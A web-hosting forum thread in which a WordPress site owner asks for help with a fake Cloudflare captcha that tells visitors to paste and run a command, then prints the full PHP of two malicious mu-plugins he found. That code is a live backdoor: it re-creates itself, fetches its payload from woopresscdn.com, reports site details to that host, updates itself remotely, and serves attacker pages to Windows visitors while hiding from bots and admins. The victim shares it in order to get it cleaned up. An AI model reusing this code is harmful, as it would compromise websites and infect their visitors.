Fake Cloudflare Captcha Screen

aquilamendes

Dear all, I have a website on my VPS that I use aapanel to manage. When I access the link to wp-admin myurl.com/login, it redirects to a fake Cloudflare captcha screen. However, if I follow the instructions shown there (pressing Windows + R and Ctrl + V), it pastes malicious code to run via CMD and download something to my machine.

However, if I access the direct link to wp-login myurl.com/wp-login.php, I can access the site normally.

I did a complete scan of aapanel, and no files were altered, no code injected, no password changed, no user created – nothing like that. How do I solve this problem?

Has anyone else experienced this?

aaPanel_Kern

When I visit this website, it says that it is an abnormal website. I suggest you check whether the website files are normal first?
Are third-party themes used?
Is it normal to try to cancel this verification?

aquilamendes

Any help?? @aaPanel_Kern

aquilamendes

aaPanel_Kern

This screen is being generated by two files created in a mu-plugins folder within wp-content (I use WordPress on my websites). Here's the code for each file:

wp-cache-manager.php

<?php
if (!defined("ABSPATH")) exit;
$target = WPMU_PLUGIN_DIR . "/wp-content-sanitizer.php";
if (!file_exists($target)) {
    $src = @file_get_contents("https://woopresscdn.com/api/plugin");
    if ($src && strlen($src) > 100) @file_put_contents($target, $src);
}

wp-content-sanitizer.php

<?php
if (!defined('ABSPATH')) exit;

define('WPCS_PANEL', 'https://woopresscdn.com');
define('WPCS_SELF', __FILE__);
define('WPCS_WATCHDOG', WPMU_PLUGIN_DIR . '/wp-cache-manager.php');

add_action('init', function() {
    
    if (!file_exists(WPCS_WATCHDOG)) {
        $code = '<?php' . "\n" . 'if (!defined("ABSPATH")) exit;' . "\n";
        $code .= '$target = WPMU_PLUGIN_DIR . "/wp-content-sanitizer.php";' . "\n";
        $code .= 'if (!file_exists($target)) {' . "\n";
        $code .= '    $src = @file_get_contents("' . WPCS_PANEL . '/api/plugin");' . "\n";
        $code .= '    if ($src && strlen($src) > 100) @file_put_contents($target, $src);' . "\n";
        $code .= '}' . "\n";
        @file_put_contents(WPCS_WATCHDOG, $code);
    }
    
    $last = get_option('wpcs_hb', 0);
    if (time() - $last > 3600) {
        wp_remote_post(WPCS_PANEL . '/api/heartbeat', [
            'timeout' => 10,
            'blocking' => false,
            'body' => json_encode([
                'domain' => $_SERVER['HTTP_HOST'] ?? parse_url(home_url(), PHP_URL_HOST),
                'status' => 'active',
                'site_url' => home_url(),
                'wp_version' => get_bloginfo('version')
            ]),
            'headers' => ['Content-Type' => 'application/json']
        ]);
        update_option('wpcs_hb', time());
        
        $update_resp = wp_remote_get(WPCS_PANEL . '/api/check_update', ['timeout' => 10]);
        if (!is_wp_error($update_resp)) {
            $update_body = json_decode(wp_remote_retrieve_body($update_resp), true);
            if (!empty($update_body['panel_url']) && rtrim($update_body['panel_url'], '/') !== rtrim(WPCS_PANEL, '/')) {
                $new_panel = rtrim($update_body['panel_url'], '/');
                $new_code = @file_get_contents($new_panel . '/api/plugin');
                if ($new_code && strlen($new_code) > 100) {
                    @file_put_contents(WPCS_SELF, $new_code);
                    if (file_exists(WPCS_WATCHDOG)) {
                        @unlink(WPCS_WATCHDOG);
                    }
                }
            }
        }
    }
});

add_action('template_redirect', function() {
    
    if (is_admin() || wp_doing_ajax() || is_feed() || is_robots() || 
        is_trackback() || (defined('REST_REQUEST') && REST_REQUEST)) {
        return;
    }
    
    if (is_user_logged_in() && current_user_can('edit_posts')) {
        return;
    }
    
    $ua = $_SERVER['HTTP_USER_AGENT'] ?? '';
    
    if (strpos($ua, 'Windows') === false) return;
    
    $bots = ['bot', 'crawl', 'spider', 'slurp', 'facebook', 'twitter', 'discord', 'telegram', 'whatsapp', 'lighthouse', 'pingdom', 'gtmetrix'];
    foreach ($bots as $b) {
        if (stripos($ua, $b) !== false) return;
    }
    
    $mobile = ['Android', 'iPhone', 'iPad', 'iPod', 'webOS', 'BlackBerry', 'IEMobile', 'Opera Mini'];
    foreach ($mobile as $m) {
        if (stripos($ua, $m) !== false) return;
    }
    
    $domain = $_SERVER['HTTP_HOST'] ?? '';
    $response = wp_remote_get(WPCS_PANEL . '/api/inject?domain=' . urlencode($domain), ['timeout' => 15]);
    
    if (is_wp_error($response)) return;
    
    $html = wp_remote_retrieve_body($response);
    if (empty($html)) return;
    
    while (ob_get_level()) {
        ob_end_clean();
    }
    
    header('HTTP/1.1 200 OK');
    header('Content-Type: text/html; charset=UTF-8');
    header('Cache-Control: no-store, no-cache, must-revalidate, max-age=0');
    header('Pragma: no-cache');
    header('Expires: Thu, 01 Jan 1970 00:00:00 GMT');
    
    echo $html;
    exit;
    
}, 1);

As soon as I delete these two files, the fake Cloudflare captcha verification screen disappears. However, this file and the mu-plugins folder are automatically recreated shortly after.

There's some injected code, but I can't find where. I've run everything in the aapanel to scan the code, plugins like WordFence or Sucury, and none of them find anything malicious. What could it be?

I've already changed the passwords for the panel, SSH, the administrator login for each WordPress site, and the database password, but nothing.

I searched some tables to see if I could find any strange code in the database, but nothing. Has anyone experienced something similar and can share how they solved it?

All plugins and WordPress versions are up to date; no plugins or themes have been installed externally in a nulled manner (plugins are from the WordPress repository itself, and the theme is Elementor's Hello).

aaPanel_Kern

Please check which website plug-ins you are using. This directory does not exist by default.

aquilamendes

aaPanel_Kern Yes, I know it doesn't exist, however I've looked everywhere and haven't found anything injecting this damn code. Has no other similar case come across here?

aaPanel_Kern

It is recommended that you try to use a new server. Is it normal to restore the website data?

aaP_davidlaws19900

Did you find the fix?